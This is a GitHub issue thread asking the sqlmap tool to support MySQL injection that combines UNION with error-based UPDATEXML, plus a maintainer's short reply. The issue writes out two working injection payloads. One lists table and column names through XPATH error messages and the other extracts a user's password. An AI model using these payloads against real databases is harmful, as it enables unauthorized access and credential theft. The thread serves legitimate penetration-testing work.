### ISSUE TITLE
[MySQL] UNION based injection combined with UPDATEXML

### ISSUE THREAD

**Issue by knods3k** [sqlmapproject/sqlmap#5509]
**Is your feature request related to a problem? Please describe.**
I have manually found a vulnerability, which sqlmap does not seem to find.
It is a UNION based injection combined with an error based UPDATEXML statement.
Posting the request, I am able to retrieve data from database in the error message of the UPDATEXML statement.

(See below for the injection statement)

**Describe the solution you'd like**
I would love for sqlmap to be able to combine error based injections with union based ones.

**Describe alternatives you've considered**
I have considered automating the retrieval in python myself.

**Additional context**
Here is what the injection looks like

`' AND 0 UNION SELECT (UPDATEXML(NULL,CONCAT(0x3a, (SELECT CONCAT(table_name, ':', column_name) FROM information_schema.columns where table_schema='username-databasename' LIMIT 0,1)),NULL)), 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 -- -`

Incrementing the first integer of the LIMIT yields the table and column names in an error messages that look like this: 

`Connection Error: XPATH syntax error: ':table1:column1'`

Then I can retrieve the data with the following statement

`' AND 0 UNION SELECT (UPDATEXML(NULL,CONCAT(0x3a, (SELECT SUBSTRING password, 1) FROM users WHERE users.username = 'some_user')),NULL)), 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 -- -`

**Comment by stamparm** [comment]
please do a custom script for this. not sure how to support this without breaking regular stuff
